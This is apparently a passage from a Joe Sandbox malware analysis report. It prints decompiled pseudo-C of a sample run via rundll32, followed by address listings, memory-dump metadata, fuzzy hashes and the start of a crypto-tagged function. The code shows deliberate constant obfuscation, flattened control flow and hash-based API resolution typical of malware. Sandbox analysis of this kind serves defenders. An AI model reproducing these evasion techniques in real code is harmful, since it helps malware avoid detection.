				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t75 =  &_v388; // 0x38423a
				_t601 = 0x7b;
				_v388 =  *_t75 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E002D7F1D(_v480, _t603, _v432, E002E8606(_v440, 0x2d1560, __eflags), _v328, _v292 - _t603, _v488);
								E002DA8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E002D7FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E002EDCF7(_v332, 0x2d15c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E002DA42D(0xab2a8d8a, 0x2b7)))();
								E002DA8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E002E0AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E002D80E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E002D7FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E002E0AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E002D80E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E002E0AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E002E0AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E002D80E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E002DED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E002E8519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
										_push(_v356);
										_t603 = E002EC0C1( &_v128, __eflags,  &_v288, E002E8606(_v492, 0x2d1610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E002DA8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}






























































































                                                                                                                                  0x002ef435
                                                                                                                                  0x002ef43f
                                                                                                                                  0x002ef446
                                                                                                                                  0x002ef44a
                                                                                                                                  0x002ef455
                                                                                                                                  0x002ef460
                                                                                                                                  0x002ef46b
                                                                                                                                  0x002ef473
                                                                                                                                  0x002ef47b
                                                                                                                                  0x002ef483
                                                                                                                                  0x002ef48b
                                                                                                                                  0x002ef496
                                                                                                                                  0x002ef49e
                                                                                                                                  0x002ef4a9
                                                                                                                                  0x002ef4b4
                                                                                                                                  0x002ef4bf
                                                                                                                                  0x002ef4ca
                                                                                                                                  0x002ef4d2
                                                                                                                                  0x002ef4dd
                                                                                                                                  0x002ef4e5
                                                                                                                                  0x002ef4ed
                                                                                                                                  0x002ef4f5
                                                                                                                                  0x002ef4fd
                                                                                                                                  0x002ef505
                                                                                                                                  0x002ef50d
                                                                                                                                  0x002ef512
                                                                                                                                  0x002ef51e
                                                                                                                                  0x002ef527
                                                                                                                                  0x002ef52c
                                                                                                                                  0x002ef532
                                                                                                                                  0x002ef53a
                                                                                                                                  0x002ef545
                                                                                                                                  0x002ef550
                                                                                                                                  0x002ef55b
                                                                                                                                  0x002ef566
                                                                                                                                  0x002ef571
                                                                                                                                  0x002ef57c
                                                                                                                                  0x002ef587
                                                                                                                                  0x002ef592
                                                                                                                                  0x002ef59a
                                                                                                                                  0x002ef59f
                                                                                                                                  0x002ef5a4
                                                                                                                                  0x002ef5ac
                                                                                                                                  0x002ef5b4
                                                                                                                                  0x002ef5bf
                                                                                                                                  0x002ef5c7
                                                                                                                                  0x002ef5c8
                                                                                                                                  0x002ef5cf
                                                                                                                                  0x002ef5da
                                                                                                                                  0x002ef5e5
                                                                                                                                  0x002ef5f0
                                                                                                                                  0x002ef5f8
                                                                                                                                  0x002ef603
                                                                                                                                  0x002ef60e
                                                                                                                                  0x002ef619
                                                                                                                                  0x002ef624
                                                                                                                                  0x002ef62f
                                                                                                                                  0x002ef63a
                                                                                                                                  0x002ef64d
                                                                                                                                  0x002ef654
                                                                                                                                  0x002ef65f
                                                                                                                                  0x002ef667
                                                                                                                                  0x002ef675
                                                                                                                                  0x002ef679
                                                                                                                                  0x002ef681
                                                                                                                                  0x002ef689
                                                                                                                                  0x002ef69c
                                                                                                                                  0x002ef6a3
                                                                                                                                  0x002ef6ae
                                                                                                                                  0x002ef6bb
                                                                                                                                  0x002ef6c6
                                                                                                                                  0x002ef6d1
                                                                                                                                  0x002ef6dc
                                                                                                                                  0x002ef6e7
                                                                                                                                  0x002ef6f2
                                                                                                                                  0x002ef6fa
                                                                                                                                  0x002ef705
                                                                                                                                  0x002ef710
                                                                                                                                  0x002ef71b
                                                                                                                                  0x002ef723
                                                                                                                                  0x002ef72e
                                                                                                                                  0x002ef739
                                                                                                                                  0x002ef744
                                                                                                                                  0x002ef74f
                                                                                                                                  0x002ef757
                                                                                                                                  0x002ef765
                                                                                                                                  0x002ef76a
                                                                                                                                  0x002ef76e
                                                                                                                                  0x002ef776
                                                                                                                                  0x002ef77e
                                                                                                                                  0x002ef789
                                                                                                                                  0x002ef793
                                                                                                                                  0x002ef794
                                                                                                                                  0x002ef79b
                                                                                                                                  0x002ef7a6
                                                                                                                                  0x002ef7b1
                                                                                                                                  0x002ef7bc
                                                                                                                                  0x002ef7c7
                                                                                                                                  0x002ef7cf
                                                                                                                                  0x002ef7df
                                                                                                                                  0x002ef7e3
                                                                                                                                  0x002ef7eb
                                                                                                                                  0x002ef7f3
                                                                                                                                  0x002ef7fb
                                                                                                                                  0x002ef800
                                                                                                                                  0x002ef808
                                                                                                                                  0x002ef810
                                                                                                                                  0x002ef818
                                                                                                                                  0x002ef820
                                                                                                                                  0x002ef825
                                                                                                                                  0x002ef82d
                                                                                                                                  0x002ef838
                                                                                                                                  0x002ef840
                                                                                                                                  0x002ef84b
                                                                                                                                  0x002ef856
                                                                                                                                  0x002ef86a
                                                                                                                                  0x002ef871
                                                                                                                                  0x002ef87c
                                                                                                                                  0x002ef887
                                                                                                                                  0x002ef88f
                                                                                                                                  0x002ef897
                                                                                                                                  0x002ef8a2
                                                                                                                                  0x002ef8aa
                                                                                                                                  0x002ef8b7
                                                                                                                                  0x002ef8bb
                                                                                                                                  0x002ef8c3
                                                                                                                                  0x002ef8cb
                                                                                                                                  0x002ef8d3
                                                                                                                                  0x002ef8db
                                                                                                                                  0x002ef8e3
                                                                                                                                  0x002ef8e8
                                                                                                                                  0x002ef8f0
                                                                                                                                  0x002ef8fb
                                                                                                                                  0x002ef903
                                                                                                                                  0x002ef90e
                                                                                                                                  0x002ef919
                                                                                                                                  0x002ef921
                                                                                                                                  0x002ef929
                                                                                                                                  0x002ef930
                                                                                                                                  0x002ef938
                                                                                                                                  0x002ef940
                                                                                                                                  0x002ef947
                                                                                                                                  0x002ef94a
                                                                                                                                  0x002ef94b
                                                                                                                                  0x002ef94f
                                                                                                                                  0x002ef954
                                                                                                                                  0x002ef958
                                                                                                                                  0x002ef960
                                                                                                                                  0x002ef968
                                                                                                                                  0x002ef973
                                                                                                                                  0x002ef97e
                                                                                                                                  0x002ef989
                                                                                                                                  0x002ef99c
                                                                                                                                  0x002ef9a3
                                                                                                                                  0x002ef9ae
                                                                                                                                  0x002ef9b9
                                                                                                                                  0x002ef9c1
                                                                                                                                  0x002ef9c6
                                                                                                                                  0x002ef9ca
                                                                                                                                  0x002ef9cf
                                                                                                                                  0x002ef9d7
                                                                                                                                  0x002ef9e4
                                                                                                                                  0x002ef9e8
                                                                                                                                  0x002ef9ed
                                                                                                                                  0x002ef9f2
                                                                                                                                  0x002ef9fa
                                                                                                                                  0x002efa05
                                                                                                                                  0x002efa10
                                                                                                                                  0x002efa1b
                                                                                                                                  0x002efa26
                                                                                                                                  0x002efa31
                                                                                                                                  0x002efa3c
                                                                                                                                  0x002efa47
                                                                                                                                  0x002efa52
                                                                                                                                  0x002efa5d
                                                                                                                                  0x002efa68
                                                                                                                                  0x002efa73
                                                                                                                                  0x002efa7b
                                                                                                                                  0x002efa8b
                                                                                                                                  0x002efa8f
                                                                                                                                  0x002efa97
                                                                                                                                  0x002efaa7
                                                                                                                                  0x002efaab
                                                                                                                                  0x002efab0
                                                                                                                                  0x002efab5
                                                                                                                                  0x002efabd
                                                                                                                                  0x002efac5
                                                                                                                                  0x002efacd
                                                                                                                                  0x002efad2
                                                                                                                                  0x002efada
                                                                                                                                  0x002efae2
                                                                                                                                  0x002efaea
                                                                                                                                  0x002efaf2
                                                                                                                                  0x002efafa
                                                                                                                                  0x002efb05
                                                                                                                                  0x002efb0d
                                                                                                                                  0x002efb18
                                                                                                                                  0x002efb25
                                                                                                                                  0x002efb29
                                                                                                                                  0x002efb31
                                                                                                                                  0x002efb39
                                                                                                                                  0x002efb41
                                                                                                                                  0x002efb49
                                                                                                                                  0x002efb4e
                                                                                                                                  0x002efb5c
                                                                                                                                  0x002efb62
                                                                                                                                  0x002efb6a
                                                                                                                                  0x002efb79
                                                                                                                                  0x002efb7c
                                                                                                                                  0x002efb83
                                                                                                                                  0x002efb87
                                                                                                                                  0x002efb8c
                                                                                                                                  0x002efb94
                                                                                                                                  0x002efbaa
                                                                                                                                  0x002efbb1
                                                                                                                                  0x002efbb8
                                                                                                                                  0x002efbc3
                                                                                                                                  0x002efbd0
                                                                                                                                  0x002efbd1
                                                                                                                                  0x002efbda
                                                                                                                                  0x002efbde
                                                                                                                                  0x002efbe6
                                                                                                                                  0x002efbee
                                                                                                                                  0x002efc03
                                                                                                                                  0x002efc07
                                                                                                                                  0x002efc0f
                                                                                                                                  0x002efc17
                                                                                                                                  0x002efc24
                                                                                                                                  0x002efc28
                                                                                                                                  0x002efc30
                                                                                                                                  0x002efc35
                                                                                                                                  0x002efc3d
                                                                                                                                  0x002efc45
                                                                                                                                  0x002efc4a
                                                                                                                                  0x002efc52
                                                                                                                                  0x002efc5a
                                                                                                                                  0x002efc62
                                                                                                                                  0x002efc67
                                                                                                                                  0x002efc6f
                                                                                                                                  0x002efc74
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc81
                                                                                                                                  0x002efc87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002efc8d
                                                                                                                                  0x002effc3
                                                                                                                                  0x002effcc
                                                                                                                                  0x002effd3
                                                                                                                                  0x002f000b
                                                                                                                                  0x002f001f
                                                                                                                                  0x002f0024
                                                                                                                                  0x002f0030
                                                                                                                                  0x002f0032
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0032
                                                                                                                                  0x002efc99
                                                                                                                                  0x002efdb2
                                                                                                                                  0x002efdc5
                                                                                                                                  0x002efdc6
                                                                                                                                  0x002efdcc
                                                                                                                                  0x002efdd4
                                                                                                                                  0x002efdd6
                                                                                                                                  0x002efddc
                                                                                                                                  0x002efde0
                                                                                                                                  0x00000000
                                                                                                                                  0x002efde0
                                                                                                                                  0x002efca5
                                                                                                                                  0x002efd4c
                                                                                                                                  0x002efd55
                                                                                                                                  0x002efd60
                                                                                                                                  0x002efd75
                                                                                                                                  0x002efd76
                                                                                                                                  0x002efd77
                                                                                                                                  0x002efd78
                                                                                                                                  0x002efd8a
                                                                                                                                  0x002efd9c
                                                                                                                                  0x002efda1
                                                                                                                                  0x002efda4
                                                                                                                                  0x002efd0b
                                                                                                                                  0x002efd0b
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc7c
                                                                                                                                  0x00000000
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efc7c
                                                                                                                                  0x002efcb1
                                                                                                                                  0x002efcb9
                                                                                                                                  0x002efcdd
                                                                                                                                  0x002efce2
                                                                                                                                  0x002efcea
                                                                                                                                  0x002efcfa
                                                                                                                                  0x002efcfb
                                                                                                                                  0x002efcfc
                                                                                                                                  0x002efcfe
                                                                                                                                  0x002efd03
                                                                                                                                  0x002efd08
                                                                                                                                  0x002efd08
                                                                                                                                  0x00000000
                                                                                                                                  0x002efcbb
                                                                                                                                  0x002efcc1
                                                                                                                                  0x00000000
                                                                                                                                  0x002efcc7
                                                                                                                                  0x002efcc7
                                                                                                                                  0x00000000
                                                                                                                                  0x002efcc7
                                                                                                                                  0x002efcc1
                                                                                                                                  0x002effc2
                                                                                                                                  0x002effc2
                                                                                                                                  0x002effc2
                                                                                                                                  0x002efd1b
                                                                                                                                  0x002efd2d
                                                                                                                                  0x002efd2e
                                                                                                                                  0x002efd2f
                                                                                                                                  0x002efd34
                                                                                                                                  0x002efd3d
                                                                                                                                  0x002efd3f
                                                                                                                                  0x002efd45
                                                                                                                                  0x00000000
                                                                                                                                  0x002efd45
                                                                                                                                  0x00000000
                                                                                                                                  0x002efd3f
                                                                                                                                  0x002efde8
                                                                                                                                  0x002efdee
                                                                                                                                  0x002eff6b
                                                                                                                                  0x002eff70
                                                                                                                                  0x002eff7e
                                                                                                                                  0x002eff8b
                                                                                                                                  0x002eff8c
                                                                                                                                  0x002eff8d
                                                                                                                                  0x002eff8f
                                                                                                                                  0x002eff94
                                                                                                                                  0x002eff98
                                                                                                                                  0x002eff9b
                                                                                                                                  0x002effa0
                                                                                                                                  0x00000000
                                                                                                                                  0x002efdf4
                                                                                                                                  0x002efdf4
                                                                                                                                  0x002efdfa
                                                                                                                                  0x002efede
                                                                                                                                  0x002efef5
                                                                                                                                  0x002efef7
                                                                                                                                  0x002eff00
                                                                                                                                  0x002eff02
                                                                                                                                  0x002eff04
                                                                                                                                  0x002eff06
                                                                                                                                  0x002eff0f
                                                                                                                                  0x002eff0f
                                                                                                                                  0x002eff11
                                                                                                                                  0x002eff13
                                                                                                                                  0x002eff15
                                                                                                                                  0x002eff18
                                                                                                                                  0x002eff18
                                                                                                                                  0x002eff18
                                                                                                                                  0x002eff2a
                                                                                                                                  0x002eff2f
                                                                                                                                  0x002eff3d
                                                                                                                                  0x002eff46
                                                                                                                                  0x002eff47
                                                                                                                                  0x002eff48
                                                                                                                                  0x002eff4a
                                                                                                                                  0x002eff4f
                                                                                                                                  0x00000000
                                                                                                                                  0x002efe00
                                                                                                                                  0x002efe00
                                                                                                                                  0x002efe06
                                                                                                                                  0x002efebe
                                                                                                                                  0x002efec3
                                                                                                                                  0x002efec7
                                                                                                                                  0x002efeca
                                                                                                                                  0x002efecf
                                                                                                                                  0x00000000
                                                                                                                                  0x002efe0c
                                                                                                                                  0x002efe0c
                                                                                                                                  0x002efe12
                                                                                                                                  0x002f0049
                                                                                                                                  0x00000000
                                                                                                                                  0x002f004f
                                                                                                                                  0x002efe18
                                                                                                                                  0x002efe1a
                                                                                                                                  0x00000000
                                                                                                                                  0x002efe20
                                                                                                                                  0x002efe20
                                                                                                                                  0x002efe2c
                                                                                                                                  0x002efe30
                                                                                                                                  0x002efe37
                                                                                                                                  0x002efe9a
                                                                                                                                  0x002efe9d
                                                                                                                                  0x002efea2
                                                                                                                                  0x002efea5
                                                                                                                                  0x00000000
                                                                                                                                  0x002efea5
                                                                                                                                  0x002efe1a
                                                                                                                                  0x002efe06
                                                                                                                                  0x002efdfa
                                                                                                                                  0x00000000
                                                                                                                                  0x002effa5
                                                                                                                                  0x002effa5
                                                                                                                                  0x002effa5
                                                                                                                                  0x002effb1
                                                                                                                                  0x00000000
                                                                                                                                  0x002effb1

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: :B8$;r$[h~$y8$|%$&e$0{
                                                                                                                                  • API String ID: 0-2624470838
                                                                                                                                  • Opcode ID: 9c60faa29b5313f28e6904689debbc6cd49e102ea6a142edb671135fec6e2c2a
                                                                                                                                  • Instruction ID: f975f0bfbbd97e8958e4e11e775e17d05e6387584047fa2ae970f94e9895bbea
                                                                                                                                  • Opcode Fuzzy Hash: 9c60faa29b5313f28e6904689debbc6cd49e102ea6a142edb671135fec6e2c2a
                                                                                                                                  • Instruction Fuzzy Hash: AE5231725093818FD3B8CF25C58AB8BFBE1BBC4348F50891DE19996260DBB49949CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DD6D8 Relevance: 9.2, Strings: 7, Instructions: 408COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002DD6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002E20B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
